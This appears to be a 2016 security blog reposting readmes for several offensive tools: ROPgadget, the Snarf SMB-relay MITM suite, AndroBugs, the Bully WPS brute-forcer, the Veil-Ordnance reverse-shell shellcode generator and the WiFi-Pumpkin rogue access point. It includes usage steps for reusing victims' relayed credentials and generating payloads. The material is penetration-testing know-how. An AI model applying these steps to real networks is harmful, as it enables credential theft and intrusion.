Saturday, 30 January 2016

ROPgadget Tool

This tool lets you search your gadgets on your binaries to facilitate your ROP exploitation. ROPgadget supports ELF/PE/Mach-O format on x86, x64, ARM, ARM64, PowerPC, SPARC and MIPS architectures. Since the version 5, ROPgadget has a new core which is written in Python using Capstone disassembly framework for the gadgets search engine - The older version can be found in the Archives directory but it will not be maintained.

How to install 

If you want to use ROPgadget, you have to install Capstone first.
For the Capstone's installation on nix machine:
$ sudo pip install capstone
Capstone supports multi-platforms (windows, ios, android, cygwin...). For the cross-compilation, please refer to thehttps://github.com/aquynh/capstone/blob/master/COMPILE.TXT file.
After Capstone is installed, ROPgadget can be used as a standalone tool:
$ ROPgadget.py
Or installed into the Python site-packages library, and executed from $PATH.
$ python setup.py install
$ ROPgadget
Or installed from PyPi
$ pip install ropgadget
$ ROPgadget

Usage

usage: ROPgadget.py [-h] [-v] [-c] [--binary <binary>] [--opcode <opcodes>]
                    [--string <string>] [--memstr <string>] [--depth <nbyte>]
                    [--only <key>] [--filter <key>] [--range <start-end>]
                    [--badbytes <byte>] [--rawArch <arch>] [--rawMode <mode>]
                    [--offset <hexaddr>] [--ropchain] [--thumb] [--console]
                    [--norop] [--nojop] [--nosys]

optional arguments:
  -h, --help           show this help message and exit
  -v, --version        Display the ROPgadget's version
  -c, --checkUpdate    Checks if a new version is available
  --binary <binary>    Specify a binary filename to analyze
  --opcode <opcodes>   Searh opcode in executable segment
  --string <string>    Search string in readable segment
  --memstr <string>    Search each byte in all readable segment
  --depth <nbyte>      Depth for search engine (default 10)
  --only <key>         Only show specific instructions
  --filter <key>       Suppress specific instructions
  --range <start-end>  Search between two addresses (0x...-0x...)
  --badbytes <byte>    Rejects specific bytes in the gadget's address
  --rawArch <arch>     Specify an arch for a raw file
  --rawMode <mode>     Specify a mode for a raw file
  --offset <hexaddr>   Specify an offset for gadget addresses
  --ropchain           Enable the ROP chain generation
  --thumb              Use the thumb mode for the search engine (ARM only)
  --console            Use an interactive console for search engine
  --norop              Disable ROP search engine
  --nojop              Disable JOP search engine
  --nosys              Disable SYS search engine
  --multibr            Enable multiple branch gadgets
  --all                Disables the removal of duplicate gadgets
  --dump               Outputs the gadget bytes

How can I contribute ?

  • Use Z3 to solve the ROP chain
  • Add system gadgets for PPC, Sparc, ARM64 (Gadgets.addSYSGadgets())
  • Manage big endian in Mach-O format like the ELF classe.
  • Everything you think is cool :)

Screenshots


x64

ARM

Sparc

MIPS

PowerPC
ROP chain

Download tool : https://goo.gl/T0Ar38

Thursday, 28 January 2016

Snarf man-in-the-middle

Snarf is a software suite to help increase the value of man-in-the-middle attacks. Many historical applications of techniques like SMB-Relay rely on assumptions, and relegate these attacks to exploitation, rather than the discovery / enumeration phase of the penetration test. While Snarf doesn't introduce new vulnerabilities, it does introduce a new capability to capitalize on exploiting familiar vulnerabilities.  




The Fundamental Idea

At its core, Snarf has one key principle in play: when you MITM something, don't throw it away. Don't just try to lob a payload through it and hope it works. Instead, we relay a connection for a client, and keep the connection to the server when the client is done. We hold onto it, and provide a facility to jack in additional tools to that same, preserved connection. This way, once we middle a connection, we can explore it. Use multiple tools, assess what privileges or rights we have, etc. -- all to give the penetration tester more direct control of the situation.

Prerequisites

You will need several key things. First, Snarf relies on iptables, so it is Linux-specific. It may be possible to move it to something like PF, but that is currently unknown. At any rate, here is a list of basic requirements:
  • Linux (Kali works fine)
  • NodeJS -- Snarf is implemented in Node to take advantage of it's snazzy event-driven I/O
  • An existing MITM / redirection strategy -- Snarf will not MITM the victim, it will only capitalize on it
    • ARP poisoning
    • DHCP poisoning
    • LLMNR poisoning
    • ICMP redirect
    • GRE tunnels
    • etc.
In most Linux distributions, the only thing you'll have to do is install Node. In a Debian-derived distribution, this would look something like this (works in Kali):
$ sudo apt-get install nodejs

Running Snarf

Here's the basic process:
  1. Do a man-in-the-middle -- Linux must be routing the traffic of your victim
  2. Run Snarf as root, binding to your LAN IP
    $ sudo node snarf.js
  3. Run the iptables rule to move traffic to SNARF's chain:
    $ sudo iptables -t nat -A PREROUTING -p tcp --dport 445 -j SNARF
  4. Open a web browser to http://localhost:4001/
  5. Wait for a connection to come through
  6. Either wait for the connection to "complete" or "expire" it manually with the provided buttons
  7. Connect your own tools (e.g., for SMB use smbclient, net, Metasploit, etc.) to 127.0.0.1. (Note, the username and password you use don't matter -- Snarf will authenticate it no matter what. The resulting session will use the snarfed connection to the server and, with it, the victim's credentials)

Known Issues

  1. For SMB, Snarf only does username/password auth, not anonymous sessions. You will want to provide a "-U user%pass" to any Samba-derived tools to make sure this will work.
  2. Snarf makes minimal changes to your traffic. So, when you do a TREE_CONNECT, it will pass the destination hostname unchanged. If you make it "localhost", then the server will give you an error about a duplicate name. This is because servers don't like being called "localhost". Instead, connect to "127.0.0.1" -- Windows doesn't mind this. In other words, run "smbclient -U b%b //127.0.0.1/c$", and don't use the name "localhost" in the command.
  3. Windows does weird and unpredictable things. Sometimes, you may end up with a session that doesn't work. This could be a bug (so feel free to let us know about it), but it could also just be a vagary of SMB. Servers don't always keep sessions around as reliably as we want, etc. So, while Snarf will dramatically improve your ability to get value out of a middled connection, remember that there is still a probabilistic aspect to any MITM attack.
  4. Make sure you follow the on-screen instructions for completing the iptables setup -- we don't apply the last iptables rule in the code because MITM is inherently dangerous. Think carefully about how that rule should be used. You probably don't want hundreds of systems coming through, so you can adjust the parameters on the "iptables -t nat -I PREROUTING -p tcp --dport 445 -j SNARF" command to ensure that only the desired systems get snarfed. 

Download tool : https://goo.gl/zukxDk

Android vulnerability scanner

AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications. No splendid GUI interface, but the most efficient (less than 2 minutes per scan in average) and more accurate.
Version: 1.0.0

Features:

  • Find security vulnerabilities in an Android app
  • Check if the code is missing best practices
  • Check dangerous shell commands (e.g. “su”)
  • Collect Information from millions of apps
  • Check the app’s security protection (marked as <Hacker>, designed for app repackaging hacking)

Author

  • Yu-Cheng Lin (androbugs.framework at gmail.com, @AndroBugs)

Steup Steps and Usage for Windows

Easy to use for Android developers or hackers on Microsoft Windows: (a) No need to install Python 2.7 (b) No need to install any 3rd-party library (c) No need to install AndroBugs Framework
  1. mkdir C:\AndroBugs_Framework
  2. cd C:\AndroBugs_Framework
  3. Unzip the latest Windows version of AndroBugs Framework from Windows releases
  4. Go to Computer->System Properties->Advanced->Environment Variables. Add "C:\AndroBugs_Framework" to the "Path" variable
  5. androbugs.exe -h
  6. androbugs.exe -f [APK file]

Massive Analysis Tool Steup Steps and Usage for Windows

  1. Complete the Steup Steps and Usage for Windows first
  2. Install the Windows version of MongoDB (https://www.mongodb.org/downloads)
  3. Install PyMongo library
  4. Config your own MongoDB settings: C:\AndroBugs_Framework\androbugs-db.cfg
  5. Choose your preferred MongoDB management tool (http://mongodb-tools.com/)
  6. AndroBugs_MassiveAnalysis.exe -h
    • Example: AndroBugs_MassiveAnalysis.exe -b 20151112 -t BlackHat -d .\All_Your_Apps\ -o .\Massive_Analysis_Reports
  7. AndroBugs_ReportByVectorKey.exe -h
    • Example: AndroBugs_ReportByVectorKey.exe -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat

Usage for Unix/Linux

To run the AndroBugs Framework:

python androbugs.py -f [APK file]

To check the usage:

python androbugs.py -h

Usage of Massive Analysis Tools for Unix/Linux

Prerequisite: Setup MongoDB and config your own MongoDB settings in "androbugs-db.cfg"

To run the massive analysis for AndroBugs Framework:

python AndroBugs_MassiveAnalysis.py -b [Your_Analysis_Number] -t [Your_Analysis_Tag] -d [APKs input directory] -o [Report output directory]
Example:
python AndroBugs_MassiveAnalysis.py -b 20151112 -t BlackHat -d ~/All_Your_Apps/ -o ~/Massive_Analysis_Reports

To get the summary report and all the vectors of massive analysis:

python AndroBugs_ReportSummary.py -m massive -b [Your_Analysis_Number] -t [Your_Analysis_Tag]
Example:
python AndroBugs_ReportSummary.py -m massive -b 20151112 -t BlackHat

To list the potentially vulnerable apps by Vector ID and Severity Level (Log Level):

python AndroBugs_ReportByVectorKey.py -v [Vector ID] -l [Log Level] -b [Your_Analysis_Number] -t [Your_Analysis_Tag]
python AndroBugs_ReportByVectorKey.py -v [Vector ID] -l [Log Level] -b [Your_Analysis_Number] -t [Your_Analysis_Tag] -a
Example:
python AndroBugs_ReportByVectorKey.py -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat
python AndroBugs_ReportByVectorKey.py -v WEBVIEW_RCE -l Critical -b 20151112 -t BlackHat -a
AndroBugs_ReportSummary.py
AndroBugs_ReportByVectorKey.py

Requirements

  • Python 2.7.x (DO NOT USE Python 3.X)
  • PyMongo library (If you want to use the massive analysis tool)


Download tool : https://goo.gl/9Dc3Ea

Tuesday, 26 January 2016

WPS brute force attack tool

Bully is a new implementation of the WPS brute force attack, written in C. It is conceptually identical to other programs, in that it exploits the (now well known) design flaw in the WPS specification. It has several advantages over the original reaver code. These include fewer dependencies, improved memory and cpu performance, correct handling of endianness, and a more robust set of options. It runs on Linux, and was specifically developed to run on embedded Linux systems (OpenWrt, etc) regardless of architecture.
Bully provides several improvements in the detection and handling of anomalous scenarios. It has been tested against access points from numerous vendors, and with differing configurations, with much success.
You must already have Wiire's Pixiewps installed. The latest version can be found here: https://github.com/wiire/pixiewps


Requirements

apt-get -y install build-essential libpcap-dev libssl-dev aircrack-ng pixiewps

Setup

Download
git clone https://github.com/aanarchyy/bully
or
wget https://github.com/aanarchyy/bully/archive/master.zip && unzip master.zip
Build
cd bully*/
cd src/
make
Install
sudo make install

Usage

  usage: bully <options> interface

  Required arguments:

      interface      : Wireless interface in monitor mode (root required)

      -b, --bssid macaddr    : MAC address of the target access point
   Or
      -e, --essid string     : Extended SSID for the access point

  Optional arguments:

      -c, --channel N[,N...] : Channel number of AP, or list to hop [b/g]
      -i, --index N          : Starting pin index (7 or 8 digits)  [Auto]
      -l, --lockwait N       : Seconds to wait if the AP locks WPS   [43]
      -o, --outfile file     : Output file for messages          [stdout]
      -p, --pin N            : Starting pin number (7 or 8 digits) [Auto]
      -s, --source macaddr   : Source (hardware) MAC address      [Probe]
      -v, --verbosity N      : Verbosity level 1-4, 1 is quietest     [3]
      -w, --workdir path     : Location of pin/session files  [~/.bully/]
      -5, --5ghz             : Hop on 5GHz a/n default channel list  [No]
      -B, --bruteforce       : Bruteforce the WPS pin checksum digit [No]
      -F, --force            : Force continue in spite of warnings   [No]
      -S, --sequential       : Sequential pins (do not randomize)    [No]
      -T, --test             : Test mode (do not inject any packets) [No]

  Advanced arguments:

      -d, --pixiewps         : Attempt to use pixiewps               [No]
      -a, --acktime N        : Deprecated/ignored                  [Auto]
      -r, --retries N        : Resend packets N times when not acked  [2]
      -m, --m13time N        : Deprecated/ignored                  [Auto]
      -t, --timeout N        : Deprecated/ignored                  [Auto]
      -1, --pin1delay M,N    : Delay M seconds every Nth nack at M5 [0,1]
      -2, --pin2delay M,N    : Delay M seconds every Nth nack at M7 [5,1]
      -A, --noacks           : Disable ACK check for sent packets    [No]
      -C, --nocheck          : Skip CRC/FCS validation (performance) [No]
      -D, --detectlock       : Detect WPS lockouts unreported by AP  [No]
      -E, --eapfail          : EAP Failure terminate every exchange  [No]
      -L, --lockignore       : Ignore WPS locks reported by the AP   [No]
      -M, --m57nack          : M5/M7 timeouts treated as WSC_NACK's  [No]
      -N, --nofcs            : Packets don't contain the FCS field [Auto]
      -P, --probe            : Use probe request for nonbeaconing AP [No]
      -R, --radiotap         : Assume radiotap headers are present [Auto]
      -W, --windows7         : Masquerade as a Windows 7 registrar   [No]
      -Z, --suppress         : Suppress packet throttling algorithm  [No]
      -V, --version          : Print version info and exit
      -h, --help             : Display this help information

-d // --pixiewps

The -d option performs an offline attack, Pixie Dust (pixiewps), by automatically passing the PKEPKRE-Hash1E-Hash2E-Nonce and Authkeypixiewps will then try to attack RalinkBroadcom and Realtek chipsets.

-v // --verbosity

The -v option specifies the verbosity of bully. -v 4 now prints all the collected hashes and outputs the pixiewps command run. Default runlevel is 3 

Download tool : https://goo.gl/1vhpKC

Friday, 22 January 2016

Veil-Ordnance Tool

Veil-Ordnance is designed to quickly generate shellcode that can be used for exploits or payloads. The inspiration for this came after multiple discussions between @christruncer, @themightyshiv, and @harmj0y where we identified a need for a tool that generates shellcode, that won't change its output on us. Rather than rely on a third party to do this, we decided we should write our own.
All payloads in this tool were ported from the Metasploit Framework. There is no claim to being the original author of any of the payloads. The awesome guys working on the Metasploit Project deserve all praise for writing the different payloads within this tool. Their payloads were simply ported from Ruby to Python.  


Usage:
./Veil-Ordnance.py -p rev_tcp --ip 192.168.63.149 --port 8675
Examples:
./Veil-Ordnance.py -p rev_https --ip 192.168.63.149 --port 443 -e xor -b \x00\x0a --print-stats
Thanks: Thanks to the Metasploit team for all their hard work. Allowing their code to be used by the community is awesome, and really appreciated. Thanks to Jon Yates (@redbeardsec) for really helping to get my up to speed and providing his analysis on how payloads are generated. Thanks to Justin Warner (@sixdub) for allowing me to include his shellcode encoder within Ordnance.
Call to Action: We'd love for an additional encoder, or more, to be added to Veil-Ordnance. The more that can be added in/ported, the better coverage in ensuring that at least one encoder could be used to prevent any specific bad character. If anyone is willing to port one, or send us a python version of their encoder, please hit us up, or send a pull request! We'd be happy to give full credit to you 

Download tool : https://goo.gl/6zXIxU

Wednesday, 20 January 2016

Wi-Fi Access Point Attack

Framework for Rogue Wi-Fi Access Point Attack

Description

WiFi-Pumpkin is a security tool that provides the Rogue access point to Man-In-The-Middle and network attacks. Purporting to provide wireless Internet services, but snooping on the traffic. Can be used to capture of credentials of unsuspecting users by either snooping the communication by phishing.

Installation

Kali 2.0/WifiSlax 4.11.1/Parrot 2.0.5
 git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
 cd WiFi-Pumpkin
 chmod +x installer.sh
 ./installer.sh --install
refer to the wiki for Installation

Features

  • Rogue Wi-Fi Access Point
  • Deauth Attack Clients AP
  • Probe Request Monitor
  • DHCP Starvation Attack
  • Credentials Monitor
  • Windows Update Attack
  • Phishing Manager
  • Partial bypass HSTS
  • Dump credentials phishing
  • Support beef hook
  • Report Logs html
  • Mac Changer
  • ARP Poison
  • DNS Spoof

Plugins

Screenshots



Tool Home 
Tool demo

Download tool : https://goo.gl/K39qMG